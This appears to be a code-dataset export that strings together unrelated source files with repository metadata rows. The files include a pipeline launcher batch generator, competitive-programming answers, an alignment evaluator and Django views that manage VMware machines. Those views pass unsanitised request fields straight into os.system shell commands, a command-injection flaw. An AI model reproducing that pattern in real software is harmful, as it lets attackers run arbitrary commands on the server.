build_dir = os.path.join(setup_module_dir, application_name + '_build')
#if build_dir exists delete
if(os.path.isdir(build_dir)):
shutil.rmtree(build_dir)
#log
print('\n\nSuccessfully deleted build directory: {0}'.format(build_dir))
except:
#log
print('Error deleting build directory')
#Create batches
#------------------------------------------------------------------
def create_batch(helga_launcher_path,
batch_dir,
batch_name,
command_line_arg_list = []):
"""
Create helga launcher batch (No UNC/relative pathes allowed)
"""
try:
#batch_file_path
batch_file_path = os.path.join(batch_dir, batch_name)
#command
command = helga_launcher_path
#add command line args
for argument in command_line_arg_list:
command += argument
#batch_file
with open(batch_file_path, 'w+') as batch_file:
#write
batch_file.write(command)
except:
#log
print('Error creating batch file')
try:
#batch_dir_name
batch_dir_name = 'batch'
#setup_module_file
setup_module_file = os.path.realpath(sys.argv[0])
#setup_module_dir
setup_module_dir = os.path.dirname(setup_module_file)
#final_dir
final_dir = os.path.join(setup_module_dir, application_name)
#batch_dir
batch_dir = os.path.join(final_dir, batch_dir_name)
#if batch dir exists, rebuild
if (os.path.isdir(batch_dir)):
#delete
shutil.rmtree(batch_dir)
#recreate
os.makedirs(batch_dir)
#helga_launcher_path
helga_launcher_path = r'Y:/Production/scripts/deploy/helga/bin/HelgaLauncher/helga_launcher_loader.exe'
#helga_launcher_path_sandbox
helga_launcher_path_sandbox = r'Y:/Production/scripts/sandbox/helga/bin/HelgaLauncher/helga_launcher_loader.exe'
#helga_launcher_path_home
helga_launcher_path_home = r'C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/helga_launcher_loader.exe'
#helga_launcher
#------------------------------------------------------------------
#helga_launcher
batch_name = 'helga_launcher.bat'
create_batch(helga_launcher_path, batch_dir, batch_name)
#helga_launcher_maya
batch_name = 'helga_launcher_maya.bat'
create_batch(helga_launcher_path, batch_dir, batch_name, [r' -rma 1'])
#helga_launcher_nuke
batch_name = 'helga_launcher_nuke.bat'
create_batch(helga_launcher_path, batch_dir, batch_name, [r' -rnk 1'])
#helga_launcher_houdini
batch_name = 'helga_launcher_houdini.bat'
create_batch(helga_launcher_path, batch_dir, batch_name, [r' -rho 1'])
#helga_launcher_sandbox
#------------------------------------------------------------------
#helga_launcher_sandbox
batch_name = 'helga_launcher_sandbox.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1'])
#helga_launcher_sandbox_maya
batch_name = 'helga_launcher_sandbox_maya.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1', r' -rma 1'])
#helga_launcher_sandbox_nuke
batch_name = 'helga_launcher_sandbox_nuke.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1', r' -rnk 1'])
#helga_launcher_sandbox_houdini
batch_name = 'helga_launcher_sandbox_houdini.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1', r' -rho 1'])
#helga_launcher home
#------------------------------------------------------------------
#helga_launcher_home
batch_name = 'helga_launcher_home.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"'])
#helga_launcher_home_maya
batch_name = 'helga_launcher_home_maya.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"',
r' -rma 1'])
#helga_launcher_home_houdini
batch_name = 'helga_launcher_home_houdini.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"',
r' -rho 1'])
#helga_launcher_home_nuke
batch_name = 'helga_launcher_home_nuke.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"',
r' -rnk 1'])
#helga_launcher home sandbox
#------------------------------------------------------------------
#helga_launcher_home_sandbox
batch_name = 'helga_launcher_home_sandbox.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"'])
#helga_launcher_home_sandbox_maya
batch_name = 'helga_launcher_home_sandbox_maya.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"',
r' -rma 1'])
#helga_launcher_home_sandbox_houdini
batch_name = 'helga_launcher_home_sandbox_houdini.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"',
r' -rho 1'])
#helga_launcher_home_sandbox_nuke
batch_name = 'helga_launcher_home_sandbox_nuke.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"',
r' -rnk 1'])
#log
print('\n\nSuccessfully created batches in: {0}'.format(batch_dir))
except:
#log
print('Error creating batches')
| [
"[email protected]"
] | |
fb8563d0c86c07072a406d9224c99e1ca35ca5d4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03433/s237464773.py | d74c7e1f2fe58c4046b4f3fe80fc54c3b637c0f6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | x, a = [int(input()) for i in range(2)]
print("Yes" if a >= x%500 else "No" ) | [
"[email protected]"
] | |
01c6a82363241a9064bcdc20ba495dec968eb0ca | 9461195cac30788855359753ac2856d746e81cd6 | /apps/estado_flujo/forms.py | 4e5747b61b4e54b2f824df8dd33ccf4402278ed3 | [] | no_license | ChristianSmith18/python-project | e15460b29e29a6bb841c82a762618f7ff86ab724 | 76d876f3fded93643af58e65f183bb6403beb755 | refs/heads/master | 2023-04-30T15:30:48.472909 | 2021-05-24T17:33:46 | 2021-05-24T17:33:46 | 370,433,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py | from django import forms
from apps.estado_flujo.models import Glo_EstadoFlujo
class estadoFlujoForm(forms.ModelForm):
class Meta:
model = Glo_EstadoFlujo
fields = [
'descripcion_estado',
'estado',
]
widgets = {
'descripcion_estado': forms.TextInput(attrs={'class': 'form-control'}),
'estado': forms.TextInput(attrs={'class': 'form-control','type':'number'}),
}
| [
"[email protected]"
] | |
6d2e0a26d4c7ad4f0faf749760e2e908565be54d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_splotches.py | ed0d1adf3f190745463d7e746b1ad80895ac0e75 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py |
from xai.brain.wordbase.nouns._splotch import _SPLOTCH
#calss header
class _SPLOTCHES(_SPLOTCH, ):
def __init__(self,):
_SPLOTCH.__init__(self)
self.name = "SPLOTCHES"
self.specie = 'nouns'
self.basic = "splotch"
self.jsondata = {}
| [
"[email protected]"
] | |
88dfa41087978b540b432a730f6068e9e609f5bc | 2edfa18568b02e63757da73254c09e195b9f4efa | /evaluation/nejm/evaluate.py | 7e2fcaf57a3bb27d779b4998aa9d3e4d76e406dd | [] | no_license | boxiangliu/ParaMed | 65e67977c88c1ce2166d08d6d40a33f6961a3486 | 08484488f4829bf144303a2e348c79e4e2ae5f71 | refs/heads/master | 2023-05-02T22:14:31.911384 | 2021-05-15T21:44:51 | 2021-05-15T21:44:51 | 217,118,327 | 19 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,436 | py | import argparse
import os
import pandas as pd
pd.options.display.max_columns = 99
import numpy as np
from collections import defaultdict
parser = argparse.ArgumentParser(description="Generate precision-recall "\
"table for sentence alignments.")
parser.add_argument("--align_fn", type=str, help="Path to ground-truth "\
"alignment file.")
parser.add_argument("--en_fn", type=str, help="Path to English sentences.")
parser.add_argument("--zh_fn", type=str, help="Path to Chinese sentences.")
parser.add_argument("--pred_fn", type=str, help="Path to prediction sentence.")
parser.add_argument("--out_fn", type=str, help="Path to output precision "\
"recall table.")
args = parser.parse_args()
os.makedirs(os.path.dirname(args.out_fn), exist_ok=True)
# Example
# args = argparse.Namespace(align_fn="../data/wmt19_biomed_modified/align_validation_zh_en.txt",
# en_fn="../data/wmt19_biomed_modified/medline_zh2en_en.txt",
# zh_fn="../data/wmt19_biomed_modified/medline_zh2en_zh.txt",
# pred_fn="../data/wmt19_biomed_modified/align_bleualign_zh_en.txt",
# out_fn="../processed_data/evaluation/wmt19_biomed/evaluate/bleualign.pr")
def align_en_zh(align, en, zh):
align["zh"] = [x.split(" <=> ")[0] for x in align["align"]]
align["en"] = [x.split(" <=> ")[1] for x in align["align"]]
docs = align.doc.unique()
alignment = defaultdict(list)
for doc in docs:
e = en[en.doc == doc]
z = zh[zh.doc == doc]
a = align[align.doc == doc]
if e.shape[0] == 0 or z.shape[0] == 0:
continue
for i, j, status in \
zip(a["zh"], a["en"], a["status"]):
zh_sent = ""
en_sent = ""
for v in i.split(","):
if v != "omitted":
v = int(v) - 1
zh_sent += z["sent"].iloc[v]
for w in j.split(","):
if w != "omitted":
w = int(w) - 1
en_sent += e["sent"].iloc[w]
alignment["doc"].append(doc)
alignment["align"].append("{} <=> {}".format(i,j))
alignment["status"].append(status)
alignment["zh"].append(zh_sent)
alignment["en"].append(en_sent)
alignment = pd.DataFrame(alignment)
return alignment
def read_data(args):
shape_getter = pd.read_table(args.align_fn, nrows=10)
ncol = shape_getter.shape[1]
print(f"{ncol} columns detected in alignment file.")
if ncol == 3:
align = pd.read_table(args.align_fn, names=["doc", "align", "status"])
elif ncol == 4:
align = pd.read_table(args.align_fn, names=["pmid", "doc", "align", "status"])
else:
raise ValueError(f"Column = {ncol} has not been implemented.")
if args.en_fn is not None and args.zh_fn is not None:
en = pd.read_table(args.en_fn, names=["doc", "sent_id", "sent"])
zh = pd.read_table(args.zh_fn, names=["doc", "sent_id", "sent"])
align = align_en_zh(align, en, zh)
else:
en = None
zh = None
return align, en, zh
def align_type(x):
out = []
for i in x:
if i is np.NaN:
out.append(np.NaN)
else:
src, tgt = i.split(" <=> ")
if src == "omitted":
src_len = 0
else:
src_len = len(src.split(","))
if tgt == "omitted":
tgt_len = 0
else:
tgt_len = len(tgt.split(","))
min_len = min(src_len, tgt_len)
max_len = max(src_len, tgt_len)
out.append("{} - {}".format(min_len, max_len))
return out
def get_precision_recall(valid, pred):
types = valid["type"].unique()
print(f"Alignment types: {types}", flush=True)
def paste(x):
return ":".join([x["doc"], x["align"]])
pr_table = defaultdict(list)
for _type in types:
try:
valid_of_type = valid[valid["type"] == _type].\
apply(lambda x: paste(x), axis=1).tolist()
pred_of_type = pred[pred["type"] == _type].\
apply(lambda x: paste(x), axis=1).tolist()
TP = sum([x in pred_of_type for x in valid_of_type])
FN = sum([x not in pred_of_type for x in valid_of_type])
FP = sum([x not in valid_of_type for x in pred_of_type])
precision = TP / (TP + FP)
recall = TP / (TP + FN)
pr_table["type"].append(_type)
pr_table["precision"].append(precision)
pr_table["recall"].append(recall)
except:
print(f"Type {_type} not found.")
pr_table = pd.DataFrame(pr_table)
return pr_table
def main():
valid, en, zh = read_data(args)
pred = pd.read_table(args.pred_fn,
names=["doc", "align","status", "zh", "en"])
valid["type"] = align_type(valid["align"])
pred["type"] = align_type(pred["align"])
pr_table = get_precision_recall(valid, pred)
pr_table.to_csv(args.out_fn, sep="\t", index=False)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
eed94a71c7239fbdd541de9a4417a48de3d95475 | ab670d6e59ebd4a0c23fa867fb77866d223163da | /Python/Problem029.py | 7fedb1207b0e2cc07512acac43d00c69115028a9 | [] | no_license | JeromeLefebvre/ProjectEuler | 18799e85947e378e18839704c349ba770af4a128 | 3f16e5f231e341a471ffde8b0529407090920b56 | refs/heads/master | 2020-07-05T02:42:44.844607 | 2014-07-26T01:04:38 | 2014-07-26T01:04:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py |
'''
Distinct powers
Problem 29
Consider all integer combinations of ab for 2 ≤ a ≤ 5 and 2 ≤ b ≤ 5:
22=4, 23=8, 24=16, 25=32
32=9, 33=27, 34=81, 35=243
42=16, 43=64, 44=256, 45=1024
52=25, 53=125, 54=625, 55=3125
If they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms:
4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125
How many distinct terms are in the sequence generated by ab for 2 ≤ a ≤ 100 and 2 ≤ b ≤ 100?
'''
from itertools import product
def problem29():
return len({a ** b for a, b in product(range(2, 100 + 1), range(2, 100 + 1))})
if __name__ == "__main__":
print(problem29() == 9183)
from cProfile import run
run("problem29()")
| [
"[email protected]"
] | |
3bf61bbfa5ba4d78c42105bc36280e5ed2f3f3b2 | 34c01d4bf7ae13b15bfbcfd90ff39f5353971820 | /examples/reactive.py | cb3d656e3187fae427834a62122f2958b8199bf1 | [] | no_license | nvbn/microasync | c78d8684119fe6cbcd1ece762a15d64940ff9eb6 | 9e4975ed5077f133051bc80c1d54042dac5b78c7 | refs/heads/master | 2021-01-23T08:56:52.382753 | 2014-10-23T20:13:49 | 2014-10-23T20:13:49 | 23,565,211 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,559 | py | from microasync.async import coroutine, as_chan, Channel, do_all, select
from microasync.device import get_switch, get_output_pin
@as_chan(Channel)
def get_bicolor_led(chan, left, right):
left_pin = get_output_pin(left)
right_pin = get_output_pin(right)
while True:
msg = yield chan.get()
print(msg)
if msg == 'red':
yield do_all(left_pin.put(1),
right_pin.put(0))
elif msg == 'green':
yield do_all(left_pin.put(0),
right_pin.put(1))
elif msg == 'yellow':
yield do_all(left_pin.put(1),
right_pin.put(1))
elif msg == 'none':
yield do_all(left_pin.put(0),
right_pin.put(0))
@as_chan(Channel)
def switchable_filter(chan, orig_chan, fn):
select_ch = select(get_switch(), chan)
enabled = False
while True:
result_ch, val = yield select_ch.get()
if result_ch == chan:
if not enabled or fn(val):
yield orig_chan.put(val)
else:
enabled = not enabled
@coroutine
def main():
first_led = switchable_filter(get_bicolor_led('X1', 'X2'),
lambda msg: msg != 'red')
second_led = switchable_filter(get_bicolor_led('X3', 'X4'),
lambda msg: msg == 'red')
while True:
for led in (first_led, second_led):
for mode in ('red', 'green', 'yellow', 'none'):
yield led.put(mode)
| [
"[email protected]"
] | |
0f7b6291b1f5cf75ec7597313122777012517352 | f875b0d80254c8f6eee4e5887869442a8abf60e4 | /Official_OpenCV_Docs/Image_Processing_In_OpenCV/changing_color_spaces.py | 2065a51ee24f675278df82863552b3ccb6733902 | [] | no_license | AmitKulkarni23/OpenCV | 6d9320fa9e4fd41af4806cda6df0fb2c641d7884 | 449468f4c9c84ffb5b66ab352086e5b23f342b45 | refs/heads/master | 2020-03-19T12:36:23.305898 | 2018-09-16T00:53:51 | 2018-09-16T00:53:51 | 136,528,669 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,703 | py | # Python file which captures video from teh camera and displays only the red color
# Everything else is blacked out
# OpenCV has >150 color spaces
# But 2 of teh important ones are BGR -> HSV and BGR -> Gray
# Changing Colorspaces - used API cv2.cvtColor
# Why HSV for color detection?
# Will help in pinpointing a more specific color
# What is HSV -> Hue, Saturation and Value
# Hue - color
# Stauration - Strenght of color
# Value - for light
# Credits: https://pythonprogramming.net/color-filter-python-opencv-tutorial/
###################################
import cv2
import numpy as np
# Creat a VideoCapture object
cap = cv2.VideoCapture(0)
while 1:
# Read frame-by-frame from teh camera
_, frame = cap.read()
# Change to hsv colorspace
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# Specify red ranges
lower_red = np.array([30,150,50])
upper_red = np.array([255,255,180])
# So we will be seeing anything in the ranges of 30-255, 150-255 and 50-180
# Mask that is created using inRange is eitehr true or false
# i.e black or white( See the mask image for more clarity)
mask = cv2.inRange(hsv, lower_red, upper_red)
# This is our result
# we show color where there is the frame AND the mask.
# The white part of the mask will be red range, that was converted to pure white, while everything else became black.
res = cv2.bitwise_and(frame,frame, mask= mask)
cv2.imshow('Original Video',frame)
cv2.imshow('Mask using inRange',mask)
cv2.imshow('Resultant Video',res)
k = cv2.waitKey(5) & 0xFF
# Break out of while loop on press of 'ESC'
if k == 27:
break
cv2.destroyAllWindows()
cap.release()
| [
"[email protected]"
] | |
eab66c8739d2f800e313c946eeac35d82206b0f6 | 2b832e5d3d88b25998f44d21fdb3fa40c2072a9e | /testcase/api/__init__.py | fb1bdccf22a848238c4b584cbd9bcd23639dd0a1 | [
"MIT"
] | permissive | lijunzhe123/Automation | 387536505e0b77fd9cc1d7dc9d017dc1268925eb | 18122ce2c5debe485fab7dac5f8007f4b7b2d51f | refs/heads/main | 2023-06-17T10:04:51.296922 | 2021-07-10T17:58:56 | 2021-07-10T17:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
'''
@author: yuejl
@application:
@contact: [email protected]
@file: __init__.py.py
@time: 2021/7/8 0008 20:59
@desc:
''' | [
"[email protected]"
] | |
6755d6111619f91330fb2eb1521513e7e2fdf071 | c5e5b2052c56e76ba4f33b36aeff26df3ac6ffb4 | /VM/views.py | f5eab429b8b4f3b2e749d2006b7cefdb15f237c1 | [] | no_license | willcai1984/Connect | c7d6d60cc8201820feb08ca61b48a2e5645ab5b6 | d89fea4964519639056ae89c311adc1a7f68a1e0 | refs/heads/master | 2016-09-05T17:30:36.449016 | 2015-03-03T09:11:16 | 2015-03-03T09:11:16 | 28,028,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,431 | py | # -*- coding: utf-8 -*-
from django.shortcuts import render_to_response
from django.template.loader import get_template
from django.template import Context
from django.http import HttpResponse
import sys, re, os, simplejson, time
from django.db import connection
def vm_manage(request):
t = get_template('html/VM/vmware_manage.html')
html = t.render(Context({'':''}))
return HttpResponse(html)
def vm_connect(request):
ip = request.POST['ip']
user = request.POST['user']
passwd = request.POST['passwd']
sql_name = 'h' + ip.replace('.', '_')
logfile, stdfile = _log()
exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_db.py --debug info")
exec_cli_list.append('-i ' + ip)
exec_cli_list.append('-u ' + user)
exec_cli_list.append('-p ' + passwd)
exec_cli_list.append('-l ' + logfile)
exec_cli_list.append('--parameters sql.name=' + sql_name)
exec_cli_list.append("1>" + stdfile + " 2>&1")
exec_cli = ' '.join(exec_cli_list)
print '''Exec CLI is: ''' + exec_cli
os.system(exec_cli)
cursor = connection.cursor()
cursor.execute("use vmware")
cursor.execute("select * from %s where flag = 1 order by display" % sql_name)
vmid_dis_reg_power_flag_tuple = cursor.fetchall()
vmid_list = []
dis_list = []
reg_list = []
power_list = []
flag_list = []
for vmid, dis, reg, power, flag in vmid_dis_reg_power_flag_tuple:
if vmid:
vmid_list.append(vmid)
dis_list.append(dis)
reg_list.append(reg)
power_list.append(power)
flag_list.append(flag)
result = {u"length":len(vmid_list)}
vmid_s = ','.join(vmid_list)
if type(vmid_s) != type(u''):
result[u"vmid_list"] = unicode(vmid_s, errors='ignore')
else:
result[u"vmid_list"] = vmid_s
dis_s = ','.join(dis_list)
if type(dis_s) != type(u''):
result[u"dis_list"] = unicode(dis_s, errors='ignore')
else:
result[u"dis_list"] = dis_s
reg_s = ','.join(reg_list)
if type(reg_s) != type(u''):
result[u"reg_list"] = unicode(reg_s, errors='ignore')
else:
result[u"reg_list"] = reg_s
power_s = ','.join(power_list)
if type(power_s) != type(u''):
result[u"power_list"] = unicode(power_s, errors='ignore')
else:
result[u"power_list"] = power_s
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def vm_refrash(request):
ip = request.POST['ip']
sql_name = 'h' + ip.replace('.', '_')
cursor = connection.cursor()
cursor.execute("use vmware")
cursor.execute("select * from %s where flag = 1 order by display" % sql_name)
vmid_dis_reg_power_flag_tuple = cursor.fetchall()
vmid_list = []
dis_list = []
reg_list = []
power_list = []
flag_list = []
for vmid, dis, reg, power, flag in vmid_dis_reg_power_flag_tuple:
if vmid:
vmid_list.append(vmid)
dis_list.append(dis)
reg_list.append(reg)
power_list.append(power)
flag_list.append(flag)
result = {u"length":len(vmid_list)}
vmid_s = ','.join(vmid_list)
if type(vmid_s) != type(u''):
result[u"vmid_list"] = unicode(vmid_s, errors='ignore')
else:
result[u"vmid_list"] = vmid_s
dis_s = ','.join(dis_list)
if type(dis_s) != type(u''):
result[u"dis_list"] = unicode(dis_s, errors='ignore')
else:
result[u"dis_list"] = dis_s
reg_s = ','.join(reg_list)
if type(reg_s) != type(u''):
result[u"reg_list"] = unicode(reg_s, errors='ignore')
else:
result[u"reg_list"] = reg_s
power_s = ','.join(power_list)
if type(power_s) != type(u''):
result[u"power_list"] = unicode(power_s, errors='ignore')
else:
result[u"power_list"] = power_s
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def vm_power(request):
#json_data = "vmid=vmid_txt;power_action=power_action"
print "Power data is :" + str(request.POST)
vmid = request.POST['vmid']
ip = request.POST['ip']
user = request.POST['user']
passwd = request.POST['passwd']
is_last = request.POST['is_last']
logfile, stdfile = _log()
power_action = request.POST['power_action']
power_id = request.POST['power_id']
exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
if str(power_action) == 'on':
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_poweron.py --debug info")
elif str(power_action) == 'off':
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_poweroff.py --debug info")
exec_cli_list.append('-i ' + ip)
exec_cli_list.append('-u ' + user)
exec_cli_list.append('-p ' + passwd)
exec_cli_list.append('-l ' + logfile)
exec_cli_list.append('--parameters vm.is_id=true vm.id=' + vmid)
exec_cli_list.append("1>" + stdfile + " 2>&1")
exec_cli = ' '.join(exec_cli_list)
print '''Exec CLI is: ''' + exec_cli
os.system(exec_cli)
result = {u"power_id":power_id, u"power_result":u"1", u"power_action":power_action, u"is_last":is_last}
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def vm_del(request):
#json_data = "vmid=vmid_txt;power_action=power_action"
print "Del data is :" + str(request.POST)
dis_name = request.POST['dis_name']
dis_id = request.POST['dis_id']
ip = request.POST['ip']
user = request.POST['user']
passwd = request.POST['passwd']
is_last = request.POST['is_last']
logfile, stdfile = _log()
exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_del.py --debug info")
exec_cli_list.append('-i ' + ip)
exec_cli_list.append('-u ' + user)
exec_cli_list.append('-p ' + passwd)
exec_cli_list.append('-l ' + logfile)
exec_cli_list.append('--parameters vm.name=' + dis_name)
exec_cli_list.append("1>" + stdfile + " 2>&1")
exec_cli = ' '.join(exec_cli_list)
print '''Exec CLI is: ''' + exec_cli
os.system(exec_cli)
result = {u"del_result":u"1", u"is_last":is_last, u"dis_name":dis_name, u"dis_id":dis_id}
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def _log():
logdir = '/var/log/will/vm/'
fname = time.strftime('%Y%m%d%H%M%S', time.gmtime())
logfile = logdir + fname + '.log'
stdfile = logdir + fname + '.std'
return logfile, stdfile
#def connect_config(request):
# t = get_template('html/Connect/config.html')
# html = t.render(Context({'': ''}))
# # return HttpResponse(html, content_type="application/x-javascript")
# return HttpResponse(html)
#
#def connect_process(request):
# exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
# exec_cli_list.append("nohup /usr/bin/python /home/will/git/AerohiveExpect/connect.py --debug info")
# if "type" in request.GET:
# exec_cli_list.append("-m '%s'" % request.GET["type"])
# if "port" in request.GET:
# exec_cli_list.append("--port '%s'" % request.GET["port"])
# if "ip" in request.GET:
# exec_cli_list.append("-i '%s'" % request.GET["ip"])
# if "prompt" in request.GET:
# exec_cli_list.append("--prompt '%s'" % request.GET["prompt"])
# if "user" in request.GET:
# exec_cli_list.append("-u '%s'" % request.GET["user"])
# if "passwd" in request.GET:
# exec_cli_list.append("-p '%s'" % request.GET["passwd"])
# if "timeout" in request.GET:
# exec_cli_list.append("-t '%s'" % request.GET["timeout"])
# if "logfile" in request.GET:
# exec_cli_list.append("-l '%s'" % request.GET["logfile"])
# for i in range(1, 6):
# if "cli_" + str(i) in request.GET:
# # Add "" for cr command
# exec '''exec_cli_list.append('-cr "'+request.GET['cli_%s']+'"')''' % i
# # stdout part
# stdfile = log2std(request.GET["logfile"])
# exec_cli_list.append("1>" + stdfile + " 2>&1 &")
# exec_cli = ' '.join(exec_cli_list)
# print '''Exec CLI is: ''' + exec_cli
# os.system(exec_cli)
# t = get_template('html/Connect/process.html')
# html = t.render(Context({'stdfile':stdfile, 'logfile':request.GET["logfile"]}))
# # return HttpResponse(html, content_type="application/x-javascript")
# return HttpResponse(html)
#
#
#def connect_process_longpull(request):
# c_re = re.compile('Connect Part Done')
# print "Connect long pull post data is '%s'" % str(request.POST)
# if request.POST.has_key('logfile'):
# logfile = request.POST['logfile']
# # stdout part
# stdfile = request.POST['stdfile']
# # print "Logfile is '%s'" % logfile
# # print "stdfile is '%s'" % stdfile
# with open(logfile) as l_o:
# l_r = re.sub(r'\n', r'</br>', l_o.read())
# with open(stdfile) as s_o:
# s_r = re.sub(r'\n', r'</br>', s_o.read())
# # print "Logfile is '%s'" % l_r
# # print "stdfile is '%s'" % s_r
# '''
# "UnicodeDecodeError: 'utf8' codec can't decode byte...
# unicode the data first
# '''
# result = {u"log":unicode(l_r, errors='ignore'), u"std":unicode(s_r, errors='ignore')}
# if c_re.search(s_r):
# result[u'is_end'] = u'y'
# else:
# result[u'is_end'] = u'n'
# #print str(result)
# result_json = simplejson.dumps(result)
# # print "Json data is '%s'" % result_json
# return HttpResponse(result_json, content_type='application/javascript')
# else:
# print "JS response has no logfile part"
#
#def connect_success(request):
# render_to_response('html/Connect/success.html', {})
#
#def connect_fail(request):
# render_to_response('html/Connect/fail.html', {})
| [
"[email protected]"
] | |
134ea0ae19f609e515c711126a5c421c4f2b288a | 850c6fd59110bbdd89a28a2ebd117be04ce3917a | /nengo_normal_form/hosted.py | 4cbcbcb5084393bea9907aeb717900c91f30748e | [
"MIT"
] | permissive | tcstewar/nengo_normal_form | e56b35b5cb36a0ed659528ab83e1116bda3dfb32 | 37ca02b20c4cc143a7bf9c27912ead36d23a04d7 | refs/heads/master | 2021-01-01T19:44:39.556970 | 2018-05-15T22:08:06 | 2018-05-15T22:08:06 | 98,668,081 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,597 | py | import nengo_normal_form
import nengo
import numpy as np
from .generic import GenericSimulator
class Host2Client(nengo.Node):
def __init__(self, conn):
self.latest_time = 0
self.latest_x = np.zeros(conn.size_out)
super(Host2Client, self).__init__(self.update,
size_in=conn.post_obj.size_in,
size_out=0)
self.post_slice = conn.post_slice
def update(self, t, x):
self.latest_time = t
self.latest_x = x[self.post_slice]
class Client2Host(nengo.Node):
def __init__(self, conn):
super(Client2Host, self).__init__(self.update,
size_in=0,
size_out=conn.size_out)
self.value = np.zeros(conn.size_out)
def update(self, t):
return self.value
class HostedSimulator(GenericSimulator):
def __init__(self, model, dt=0.001, progress_bar=True):
super(HostedSimulator, self).__init__(dt=dt, progress_bar=progress_bar)
norm_model, probes = nengo_normal_form.convert(model)
self.host2client = {}
self.client2host = {}
self.client_conns = []
self.client_objs = []
host_model = nengo.Network()
for node in norm_model.nodes:
if self.is_on_host(node):
host_model.nodes.append(node)
else:
self.client_objs.append(node)
for ens in norm_model.ensembles:
if self.is_on_host(ens):
host_model.ensembles.append(ens)
else:
self.client_objs.append(ens)
for c in norm_model.connections:
host_pre = self.is_on_host(c.pre_obj)
host_post = self.is_on_host(c.post_obj)
if host_pre:
if host_post:
host_model.connections.append(c)
else:
with host_model:
self.host2client[c] = Host2Client(c)
nengo.Connection(
c.pre,
self.host2client[c],
synapse=c.synapse,
transform=c.transform,
function=c.function,
label=c.label)
else:
if host_post:
with host_model:
self.client2host[c] = Client2Host(c)
nengo.Connection(
self.client2host[c],
c.post,
synapse=c.synapse,
transform=c.transform,
label=c.label)
else:
self.client_conns.append(c)
self.host = nengo.Simulator(host_model, progress_bar=False)
for p, pnode in probes.items():
self.data[p] = pnode.data
def step(self):
self.host.step()
